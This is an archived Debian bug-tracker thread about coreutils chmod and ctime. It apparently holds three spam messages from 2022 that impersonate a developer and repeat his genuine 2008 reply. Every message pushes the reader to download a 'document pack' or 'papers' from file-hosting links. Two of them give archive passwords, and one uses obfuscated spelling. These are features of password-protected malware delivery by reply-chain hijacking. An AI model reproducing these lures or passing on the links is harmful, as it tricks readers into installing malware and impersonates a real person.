Subject: Re: Bug#497514: coreutils: chmod, chown, and chgrp change ctime even when no change was necessary

From: "Michael Stone" <[email-masked]>
Date: Tue, 15 Mar 2022 08:41:35 -0800

Hello!
Last week I've received the document pack from the management branch. Can you please check it? I've uploaded it lower:

https://onedrive.live.com/download?cid=A6C007BB1CC8DDB8&resid=A6C007BB1CC8DDB8%21108&authkey=APc8hqLX5uQfnLo

File password: E4345

On Fri, Sep 12, 2008 at 09:51:04PM +0200, Jim Meyering wrote: >That sounds like a good reason to retain the behavior you've come to >value, even if it's not guaranteed or portable, but only via a new >option. Then we can still change the default to be more efficient. Why on earth would we want to? Some people obviously like the current behavior, and depend on the side effects, the desired behavior is easy to get with existing tools, and adding a new option seems like something that shouldn't be done without a very good reason. This seems like optimization for the sake of optimization. (And it would make chmod inconsistent with chown and chgrp.) Mike Stone

---

From: "Michael Stone" <[email-masked]>
Date: Mon, 16 May 2022 07:07:08 -0800

Hi,

As s-oo-n as yo-u go over these, we need to set up time to chat:

https://complique.org/iqev/edriiu137821509

https://onedrive.live.com/download?cid=NQ1GHKHIXQQCRE1Q&resid=NQ1GHKHIXQQCRE1Q%94645&authkey=6rZusqy9YMpB-qv
On Fri, Sep 12, 2008 at 09:51:04PM +0200, Jim Meyering wrote: >That sounds like a good reason to retain the behavior you've come to >value, even if it's not guaranteed or portable, but only via a new >option. Then we can still change the default to be more efficient. Why on earth would we want to? Some people obviously like the current behavior, and depend on the side effects, the desired behavior is easy to get with existing tools, and adding a new option seems like something that shouldn't be done without a very good reason. This seems like optimization for the sake of optimization. (And it would make chmod inconsistent with chown and chgrp.) Mike Stone

---

From: "Michael Stone" <[email-masked]>
Date: Tue, 21 Jun 2022 13:39:49 +0000

Greetings to you

With this letter I send you all the necessary papers regarding our soon meeting, right as we revealed recently. Please take a look at аll important  data here:

https://drive.google.com/uc?export=download&id=1EDAvQMt-TmgIQKH8GkDbz5atFUrQj3AK&confirm=t

File password: E98346